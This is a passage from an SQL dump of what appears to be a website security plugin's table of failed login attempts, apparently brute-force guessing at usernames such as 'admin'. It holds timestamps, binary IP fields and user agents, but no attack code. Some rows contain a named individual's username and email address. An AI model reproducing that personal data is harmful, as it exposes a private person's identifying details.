Gecko/20100101 Firefox/62.0'),(4505,7018,1628959506.629073,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@o~Q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4506,7019,1628960209.606193,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(4507,7020,1628961330.743169,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4508,7021,1628963160.606705,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4509,7022,1628964169.962673,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(4510,7023,1628965021.627296,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B�r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4511,7028,1628968743.982363,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Ng8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4512,7033,1628974496.776970,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Hӱ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4513,7034,1628974526.604569,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(4514,7038,1628978472.618249,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4515,7042,1628982253.716207,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4516,7046,1628986123.984606,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#�,&','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(4517,7047,1628986783.654006,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4518,7049,1628988727.213559,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(4519,7050,1628988945.326205,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����jQ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4520,7051,1628990045.550203,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4r','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4521,7051,1628990045.566751,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4r','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(4522,7055,1628993354.541133,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4523,7056,1628993977.344818,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_��[','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4524,7061,1628999527.185655,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k�X)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4525,7062,1629000264.526003,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(4526,7063,1629001360.500171,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4527,7065,1629002861.120120,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4528,7066,1629002866.048570,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4529,7067,1629002869.738238,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4530,7068,1629002873.454743,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4531,7069,1629002877.194453,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4532,7070,1629002881.437778,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4533,7071,1629002885.052170,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���v�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(4534,7072,1629003177.576206,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��MD~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4535,7077,1629006797.876668,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4536,7078,1629006936.213763,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��l���','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(4537,7079,1629007235.835456,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����P','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(4538,7081,1629008676.508049,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0���kIJ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(4539,7084,1629009288.222955,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4540,7086,1629009770.247039,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��4��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4541,7087,1629009928.759856,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ϔy�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4542,7088,1629010227.101436,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��%H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4543,7089,1629010239.545672,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���kľ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(4544,7091,1629010443.543072,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4545,7092,1629010575.526714,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4546,7094,1629011098.258995,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3QJ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4547,7095,1629011205.316350,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���S��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4548,7096,1629011432.496682,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4549,7098,1629011755.746485,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4550,7099,1629011982.220273,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��q�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4551,7100,1629012207.542242,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4552,7101,1629012454.551687,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4553,7102,1629012466.739947,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4554,7103,1629012857.913559,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���H�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4555,7104,1629012998.472317,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\"]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4556,7106,1629013487.989208,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4557,7107,1629013741.651700,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0����P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4558,7108,1629013765.749870,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(4559,7109,1629013857.264488,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��h�\Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4560,7110,1629014154.598545,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4561,7113,1629014606.512919,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4562,7114,1629014768.357174,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����=*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4563,7116,1629015079.487621,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4564,7118,1629015458.715495,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4565,7119,1629015734.583167,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-�f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4566,7121,1629016268.938075,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4567,7123,1629016778.109015,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ư�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4568,7124,1629017049.578227,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4569,7125,1629017170.097044,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���AY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4570,7126,1629017449.409470,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����N�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4571,7127,1629017669.618710,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4572,7128,1629017881.381224,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��RЧE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4573,7129,1629018008.692376,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ư�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4574,7130,1629018327.619954,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����Er','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4575,7131,1629018366.491827,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(4576,7133,1629018774.362361,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��#� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4577,7134,1629019027.771528,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4578,7135,1629019168.109902,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4579,7135,1629019168.190623,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4580,7136,1629019477.723026,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���!ƫ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4581,7137,1629019516.547735,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Y`Z}','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(4582,7138,1629019661.277036,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��MD ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4583,7139,1629020069.876608,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4584,7140,1629020320.284682,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4585,7141,1629020529.236729,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4586,7142,1629020657.820256,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����@�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(4587,7143,1629020812.930734,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��RЧE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4588,7144,1629021223.390559,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��?\"��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4589,7145,1629021480.468584,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4590,7146,1629021607.069644,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��.e�G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4591,7148,1629021890.914261,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��P��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4592,7149,1629022103.607746,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4593,7150,1629022325.038115,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��U��(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4594,7152,1629022499.473504,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���cL\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4595,7153,1629022709.280816,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����=*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4596,7154,1629022957.740089,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���H�%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4597,7156,1629023233.127743,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���,��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4598,7157,1629023414.507880,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���cD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4599,7158,1629023769.599583,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4600,7159,1629023892.943861,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��`L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4601,7161,1629024153.330894,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���La','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4602,7162,1629024370.109907,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4603,7163,1629024428.978115,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����#X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4604,7164,1629024557.089637,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4605,7165,1629024706.230180,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4606,7166,1629025028.774048,1,'loginFailInvalidUsername','dsa',0,'\0\0\0\0\0\0\0\0\0\0��-?m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4607,7167,1629025234.052994,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4608,7168,1629025521.012118,1,'loginFailInvalidUsername','enamad',0,'\0\0\0\0\0\0\0\0\0\0��g�**','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4609,7169,1629025657.646562,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��{��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4610,7170,1629025963.445888,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���Z�C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4611,7171,1629026158.485411,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g*o;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4612,7172,1629026371.874030,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���H�l','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4613,7173,1629026421.718000,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(4614,7174,1629026515.042927,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4615,7176,1629026986.957491,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��ϔy�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4616,7177,1629027228.536819,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���aG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4617,7178,1629027454.248613,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.e\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4618,7179,1629027578.319340,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��R�,�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(4619,7180,1629027700.209262,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g�\\x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4620,7181,1629028195.713848,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4621,7183,1629028581.986317,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-w�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4622,7185,1629028732.376166,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��իо','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(4623,7186,1629028853.851805,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4624,7187,1629029081.818169,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��-?m�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4625,7188,1629029210.151000,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����դ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4626,7189,1629029762.031037,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4627,7190,1629029932.744281,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.e\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4628,7192,1629030457.896666,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 